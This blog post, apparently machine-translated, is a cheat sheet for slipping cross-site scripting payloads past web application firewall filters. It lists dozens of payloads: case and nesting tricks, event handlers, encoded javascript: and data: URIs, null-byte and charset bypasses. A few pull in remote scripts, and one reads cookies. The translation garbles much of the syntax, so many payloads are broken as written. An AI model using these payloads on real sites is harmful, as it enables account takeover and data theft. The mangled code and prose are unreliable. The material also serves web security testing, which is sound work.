Oct 9, 2014

Home » , , , » Bypass WAF XSS Filters

Bypass WAF XSS Filters

By 3 comments
This article comes from the "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" which bypass xss filter section, in front of a feature according to WAF WAF determine which test method to skip, and a look behind the focus around some basic xss testing process, although it is around the WAF, but here is based on the regular WAF defect to bypass testing methods, not agreement on the issue, so, basically xss filter can be common to other scenarios.Relatively easy to novices quickly learned some of the basic methods of testing xss.
Bypassing Blacklists
Most of the sites are done using blacklists to filter, there are three ways to bypass blacklist tests:
1> A violent test (input large amounts of payload, see return results)
2> according to the regular projections
3> using a browser bug

Preliminary tests

1) try to insert more normal HTML tags, such as: <b>, <i>, <u> look at the situation return to the page is like, whether HTML coding, or the label is filtered.
2) Try to insert tags are not closed, for example: <b, <i, <u, <marquee and then look back a response, whether open label also has filtering.
3) Then test of several XSS payload, basically all the xss filter will be filtered:
<Script> alert (1); </ script>
<Script> prompt (1); </ script>
<Script> confirm (1); </ script>
<Scriptsrc = "http://rhainfosec.com/evil.js">
See returns response is filtered all, or only a portion of the filter, if also left alert, prompt, confirm the characters, then try the case of a combination of:
<ScRiPt> alert (1); </ scrIPt>
4) If the filter is only the <script> and </ script> tag filtered out, then you can use
<Scr <script> ipt> alert (1) </ scr <script> ipt>
The way to get around, so that when the <script> tag is filtered out, leaving just combined to form a full payload.
5) with <a href tag to test to see if the response is returned
<a href="http://www.google.com"> Clickme </a>
<A href tag is being filtered by the filter if href whether data is filtered in
If no data is filtered, insert the javascript protocol to see:
<a href="javascript:alert(1)"> Clickme </a>
Whether to return an error if javascript entire contents of the agreement have been filtered out, or just filter under the javascript character case conversion attempt
Continue to test events trigger the execution of javascript:
<a href="rhainfosec.com" onmouseover=alert(1)> ClickHere </a>
To see whether the onmouseover event is filtered. Testing an invalid event, watching filtering rules:
<a href="http://www.madleets.com" onclimbatree=alert(1)> ClickHere </a>
Is a complete return to it, or just like onmouseover is blown away.
If it is full, then it is returned, it means, do a blacklist of events, but in HTML5, there are more than 150 kinds of ways to execute javascript code to test a rare event event:
<Body / onhashchange = alert (1)> <a href=#> clickit

Test other tag

The next test other tag with attributes

Src attribute

<Img src = x onerror = prompt (1);>
<Img / src = aaa.jpg onerror = prompt (1);> 
<Video src = x onerror = prompt (1);>
<Audio src = x onerror = prompt (1);>

iframe tag

<Iframe src = "javascript: alert (2)">
<Iframe / src = "data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==">

embed tag

<Embed / src = // goo.gl/nlX0P>

action attribute

Use <form, <isindex other labels in the action attribute execute javascript

<Form action = "Javascript: alert (1)"> <input type = submit>
<Isindex action = "javascript: alert (1)" type = image>
<Isindex action = j & Tab; a & Tab; vas & Tab; c & Tab; r & Tab; ipt: alert (1) type = image>
<Isindex action = data: text / html, type = image>
<Formaction = 'data: text & sol; html, & lt; script & gt; alert (1) & lt / script & gt'> <button> CLICK

formaction property

<Isindexformaction = "javascript: alert (1)" type = image>
<Input type = "image" formaction = JaVaScript: alert (0)>
<Form> <button formaction = javascript & colon; alert (1)> CLICKME

background properties

<Table background = javascript: alert (1)> </ table> // effective in Opera 10.5 and IE6

poster Properties

<Video poster = javascript: alert (1) //> </ video> // Opera 10.5 or less effective

data attributes

<Object data = "data: text / html; base64, PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4 =">
<Object / data = // goo.gl/nlX0P?
code attribute
<Applet code = "javascript: confirm (document.cookie);"> // Firefox effective
<Embed code = "http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>

Event triggers

<Svg / onload = prompt (1);>
<Marquee / onstart = confirm (2)> /
<Body onload = prompt (1);>
<Select autofocus onfocus = alert (1)>
<Textarea autofocus onfocus = alert (1)>
<Keygen autofocus onfocus = alert (1)>
<Video> <source onerror = "javascript: alert (1)">

The shortest test vectors

<Q / oncut = open ()>
<Q / oncut = alert (1)> // in place to limit the length of a very effective

Nesting

<Marquee <marquee / onstart = confirm (2)> / onstart = confirm (1)>
<Bodylanguage = vbsonload = alert-1 // IE8 effective
<Command onmouseover
= "\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B "> Save </ command> // IE8 effective

Under the circumstances the filter brackets

When the brackets are filtered when you can use the throw to bypass
<a onmouseover="javascript:window.onerror=alert;throw 1>
<Img src = x onerror = "javascript: window.onerror = alert; throw 1">
These two test vectors in Chrome with IE on top there will be a "uncaught" error, you can use the following vectors:
<Body / onload = javascript: window.onerror = eval; throw '= alert \ x281 \ x29';>

expression attribute

<Img style = "xss: expression (alert (0))"> // IE7 following
<Div style = "color: rgb ('' & # 0; x: expression (alert (1))"> </ div> // IE7 following
<Style> #test {x: expression (alert (/ XSS /))} </ style> // IE7 following

location attribute

<a onmouseover=location='javascript:alert(1)'> click
<Body onfocus = "loaction = 'javascript: alert (1)'"> 123

Some other payload

<Meta http-equiv = "refresh" content = "0; url = // goo.gl/nlX0P">
<Meta http-equiv = "refresh" content = "0; javascript & colon; alert (1)" />
<Svg xmlns = "http://www.w3.org/2000/svg"> <g onload = "javascript: \ u0061lert (1);"> </ g> </ svg>
<Svg xmlns: xlink = "http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = "xlink: href" values ​​= "; javascript: alert (1 ) "begin =" 0s "dur =" 0.1s "fill =" freeze "/>
<Svg> <! [CDATA [> <imagexlink: href = "]]> <img / src = xx: xonerror = alert (2) //"> </ svg>
<Meta content = "& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)" http-equiv = "refresh" />
<Math> <a xlink:href="//jsfiddle.net/t846h/"> click

When = ();: When is filtered

<Svg> <script> alert & # 40/1 / & # 41 </ script> // pass to kill all browsers
opera can not close
<Svg> <script> alert & # 40 1 & # 41 // Opera to be investigated

Entity encoding

In many cases the entity will be encoded input data WAF users,
javascript is a very flexible language, you can use a lot of coding, such as Hex, Unicode and HTML. However, these codes can also be used in which position provisions:
Attributes:
href =
action =
formaction =
location =
on * =
name =
background =
poster =
src =
code =
Supported encoding: HTML, octal, decimal, hexadecimal and Unicode
Attributes:
data =
Supported encoding: base64

Filtering based on context

WAF biggest problem is that I do not know the context of the output of the position, resulting in specific environments can be bypassed.

Enter in the property

<Input value = "XSStest" type = text>
Controllable position XSStest, you can use
"> <Img src = x onerror = prompt (0);>
If <> is filtered, then you can be replaced
"Autofocus onfocus = alert (1) //
Similarly there are many other payload:
"Onmouseover =" prompt (0) x = "
"Onfocusin = alert (1) autofocusx ="
"Onfocusout = alert (1) autofocus x ="
"Onblur = alert (1) autofocusa ="

Enter the script tag

For example:
<Script>
Var x = "Input";
</ Script>
Controllable position Input, you can close the script tag to insert the code, but also we just closed the double quotes can execute js code
"; Alert (1) //
The end result is
<Script>
Var x = ""; alert (1) //
</ Script>

Unconventional event listener

For example:
"; Document.body.addEventListener (" DOMActivate ", alert (1)) //
"; Document.body.addEventListener (" DOMActivate ", prompt (1)) //
"; Document.body.addEventListener (" DOMActivate ", confirm (1)) //
The following are some of the same categories:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

HREF content controllable

For example:
<a href="Userinput"> Click </a>
Controllable is Userinput where we need to do is enter the javascript code like:
javascript: alert (1) //
Finally, the combination of:
<a href="javascript:alert(1)//"> Click </a>

Transform

URL encoded using HTML entities to bypass the blacklist, href where the entity will automatically decode, if all else fails, you can try using vbscript in IE10 below are valid, or use the data protocol.

JavaScript transformation

When using the javascript protocol can use examples:
javascript & # 00058; alert (1)
javaSCRIPT & colon; alert (1)
JaVaScRipT: alert (1)
javas & Tab; cript: \ u0061lert (1);
javascript: \ u0061lert & # x28; 1 ​​& # x29
javascript & # x3A; alert & lpar; document & period; cookie & rpar;

Vbscript transformation

vbscript: alert (1);
vbscript & # 00058; alert (1);
vbscr & Tab; ipt: alert (1) "
Data URl
data: text / html; base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg ==

JSON

When you enter will be displayed in the encodeURIComponent them, it is very easy to insert xss code
encodeURIComponent ('userinput')
userinput at controllable, test code:
-alert (1) -
-prompt (1) -
-confirm (1) -
The end result:
encodeURIComponent ("- alert (1) -")
encodeURIComponent ("- prompt (1) -")

SVG tag

When returning results when the svg tag, there will be a feature
<Svg> <script> varmyvar = "YourInput"; </ script> </ svg>
YourInput controllable input
www.site.com/test.php?var=text";aler
t(1)//
If the "coding some he is still able to perform:
<Svg> <script> varmyvar = "text & quot ;; alert (1) //"; </ script> </ svg>

Browser bug

Charset bug in IE appear many times, the first one is UTF-7, but this is only available in previous versions, you can now discuss the javascript executed in a browser now among.
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
This page which we controlled the character set of the current page, when our regular tests:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src = x onerror = prompt (0);>
Return result can be seen in double quotes were coded:
<Html>
<Meta charset = "utf-8"> </ meta>
<Body>
<Input type = "text" value = "& quot; & gt; & lt; img src = x onerror = prompt (0); & gt;"> </ input>
</ Body>
</ Html>
Set the character set is UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1 )% E3% B0% 80 / script% E3% B8% 80
The above can be performed successfully in IE9 and below.
Use 0 bytes bypass:
<Scri% 00pt> alert (1); </ scri% 00pt>
<Scri \ x00pt> alert (1); </ scri% 00pt>
<S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
In the following version IE9 and effective.

3 comments:

Do Not Abuse Anyone